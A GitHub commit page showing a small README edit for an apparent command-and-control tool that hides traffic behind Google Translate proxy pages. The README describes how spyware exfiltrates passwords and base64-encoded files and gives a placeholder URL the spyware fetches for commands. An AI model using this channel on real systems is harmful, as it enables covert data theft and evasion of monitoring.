Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
Gakamine authored Jan 25, 2023
1 parent 4c853f7 commit daefa93
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -18,9 +18,9 @@ A simple C2 meant to be used behind Google Translate Webpages as a proxy for dat
- ``data_type`` is the keyword you want to filter data. It can be for example a password type.
- ``hash_file`` is a flag to know if the exfiltrated data is a file or a string. You must send the hash of the file you want to upload to recreate the file. It allows the admin dashboard to know if it has to decode the received data or not. **(OPTIONAL)**
- ``data`` is the content you want to exfiltrate. If it's a file, it can be encoded in base64 and decoded automatically on the admin dashboard. If it's a base64 data, you must split it into multiple strings otherwise Google Translate will limit you.
You can expand the size of the data by editing ``collector\models.py`` and edit the ``max_length=<your value>`` for the ``data_content`` field.

### Sending command
- Fetch the following link from your client/spyware: ``https://your-domain.translate.goog/c/<hostname>/<ip>/``

You can expand the size of the data by editing ``collector\models.py`` and edit the ``max_length=<your value>`` for the ``data_content`` field.
# FOR EDUCATIONAL PURPOSE ONLY

0 comments on commit daefa93

Please sign in to comment.